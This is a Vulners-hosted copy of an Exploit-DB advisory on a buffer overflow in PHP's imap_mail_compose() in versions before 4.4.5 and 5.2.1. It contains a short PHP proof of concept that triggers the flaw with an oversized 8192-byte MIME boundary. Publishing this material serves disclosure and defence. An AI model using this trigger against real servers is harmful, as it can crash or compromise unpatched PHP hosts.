Lucene search
+L

PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow

🗓️ 31 Mar 2007 00:00:00Reported by Stefan EsserType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 54 Views

PHP 5.1.6 'Imap_Mail_Compose()' Remote Buffer Overflow vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
PHP < 4.4.5 / 5.2.1 Multiple Vulnerabilities
9 Feb 200700:00
nessus
nessus
Tenable Nessus
CentOS 3 / 4 : php (CESA-2007:0076)
21 Feb 200700:00
nessus
nessus
Tenable Nessus
Oracle Linux 3 / 4 : php (ELSA-2007-0076)
12 Jul 201300:00
nessus
nessus
Tenable Nessus
PHP < 4.4.5 Multiple Vulnerabilities
2 Apr 200700:00
nessus
nessus
Tenable Nessus
PHP < 5.2.1 Multiple Vulnerabilities
2 Apr 200700:00
nessus
nessus
Tenable Nessus
RHEL 4 : php (RHSA-2007:0076)
21 Feb 200700:00
nessus
nessus
Tenable Nessus
RHEL 2.1 : php (RHSA-2007:0081)
23 Feb 200700:00
nessus
nessus
Tenable Nessus
RHEL 5 : php (RHSA-2007:0082)
25 May 200700:00
nessus
centos
Cent OS
php security update
19 Feb 200721:40
centos
centos
Cent OS
php security update
25 Feb 200706:02
centos
Rows per page
source: https://www.securityfocus.com/bid/23234/info

PHP is prone to a buffer-overflow vulnerability because the application fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users.

This issue affects PHP versions prior to 4.4.5 and 5.2.1.

<?php

$envelope["from"]= "[email protected]";
$envelope["to"]  = "[email protected]";

$part1["type"] = TYPEMULTIPART;
$part1["subtype"] = "mixed";
$part1["type.parameters"] = array("BOUNDARY" => str_repeat("A",8192));

$part2["type"] = TYPETEXT;
$part2["subtype"] = "plain";
$part2["description"] = "description3";
$part2["contents.data"] = "contents.data3\n\n\n\t";

$body[1] = $part1;
$body[2] = $part2;

imap_mail_compose($envelope, $body);

?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.10382
54